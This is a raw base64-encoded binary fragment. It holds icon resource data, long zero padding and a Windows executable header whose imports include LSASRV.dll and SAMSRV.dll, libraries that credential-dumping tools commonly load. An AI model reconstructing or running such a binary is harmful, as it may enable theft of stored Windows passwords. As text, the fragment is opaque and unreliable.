pwAAAA0AAAC3AAAAEQAAAM4AAAACAAAA1wAAAAsAAAAYBwAADAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAwAAACAAAIAOAAAAQAAAgAAAAAAAAAAAAAAAAAAAAgABAAAA WAAAgAIAAABwAACAAAAAAAAAAAAAAAAAAAABAGUAAACIAACAAAAAAAAAAAAAAAAAAAABAAQI AACgAAAAAAAAAAAAAAAAAAAAAAABAAQIAACwAAAAAAAAAAAAAAAAAAAAAAABAAQIAADAAAAA 0FAJAOgCAAAAAAAAAAAAALhTCQAoAQAAAAAAAAAAAADgVAkAIgAAAAAAAAAAAAAAKAAAACAA AABAAAAAAQAEAAAAAACAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL8AAL8AAAC/vwC/AAAA vwC/AL+/AADAwMAAgICAAAAA/wAA/wAAAP//AP8AAAD/AP8A//8AAP///wAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAd3gzqgAAAAAAAAAAAAAHf3d4M6p3gAAAAAAAAAAP9/d3eDOqd8hgAAAA AAAA//9/d3gzqnjGZgAAAAAAD///93d4OKd8hmZgAAAAAHf//393eDenjGZmdwAAAAeHf//3 93g3p8hmZ3dwAAAIeHf//3d4OqjGZnd34AAAh4eHf//3eDqshmd37u4AAHh4eHf/f3g6jGZ3 7u67AAeHh4eHf/d4Oshnfuu7uqAIeHh4eHf4iIjGfru7qqqgB4eHh4eHiAAAiLu6qqMzMAh4 eHh4eICP+AgzMzPd3dAIiIiIiIiA//8IXV1dXV1QBdXV1dXVgP//CIiIiIiIgA3d3TMzM4CP +AiHh4eHh4ADMzqqq7uIAACIeHh4eHhwCqqqu7vnbIiIj3eHh4eHgAqru77ndoyjh3/3eHh4 eHAAu+7ud2bIo4f3/3eHh4cAAO7ud3ZoyqOHf//3eHh4AAAOd3dmbIqjh3f//3eHgAAAB3d2 Zox6c4d/f//3eHAAAAB3ZmbIenOHd/f//3cAAAAABmZox3qDh3d////wAAAAAABmbIeqM4d3 9///AAAAAAAABox3qjOHd39/8AAAAAAAAAAId6ozh3f3cAAAAAAAAAAAAACqM4d3AAAAAAAA AAAAAAAAAAAAAAAAAAAAAP/wD///gAH//gAAf/wAAD/4AAAf8AAAD+AAAAfAAAADwAAAA4AA AAGAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAGAAAAB wAAAA8AAAAPgAAAH8AAAD/gAAB/8AAA//gAAf/+AAf//8A//KAAAABAAAAAgAAAAAQAEAAAA AADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAIAAAACAgACAAAAAgACAAICAAACAgIAA wMDAAAAA/wAA/wAAAP//AP8AAAD/AP8A//8AAP///wAAAAAAAAAAAAAACIc6gAAAAA/4hzLM YAAACPiHMsZoAACHj4csZoYACHh4hyxoqqAHh4dwCCqiIAh4eA/wERVQBVERD/CHh4ACKqKA CHh4cAqqhsJ4h4eAAGhmwnj4eAAAhmwjeI+IAAAGzCN4j/AAAAAIo3iAAAAAAAAAAAAAAPgf AADgBwAAwAMAAIABAACAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAEAAIABAADAAwAA 4AcAAPgfAAAAAAEAAgAgIBAAAQAEAOgCAAABABAQEAABAAQAKAEAAAIAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATVqQAAMA AAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAACJn8/9zf6hrs3+oa7N/qGuzf6grtb+oa6U3bKuxP6hrpv2p67M/qGu zf6hrsn+oa5SaWNozf6hrgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQMA43o0OAAA AAAAAAAA4AAPAwsBBQwADAAAAIAAAAAAAABYEgAAABAAAAAgAAAAAAABABAAAAACAAAFAAAA BQAAAAQAAAAAAAAAALAAAAAGAAB2RgEAAgAAgAAABAAAYAAAAAAQAAAQAAAAAAAAEAAAAAAA AAAAAAAAhBgAAGQAAAAAMAAAWH0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKAQAAAcAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAgAAYAAAAAAQAAB8AAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAACgCwAAABAAAAAMAAAABgAAAAAAAAAAAAAAAAAA IAAAYC5kYXRhAAAAGAAAAAAgAAAAAgAAABIAAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAAACA AAAAMAAAAH4AAAAUAAAAAAAAAAAAAAAAAABAAABANNBEODAAAQAwWxc4PQAAADBbFzg9AAAA Ivl0OEcAAAAk+XQ4UgAAAAAAAAAAAAAAS0VSTkVMMzIuZGxsAE5URExMLkRMTABMU0FTUlYu ZGxsAFNBTVNSVi5kbGwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 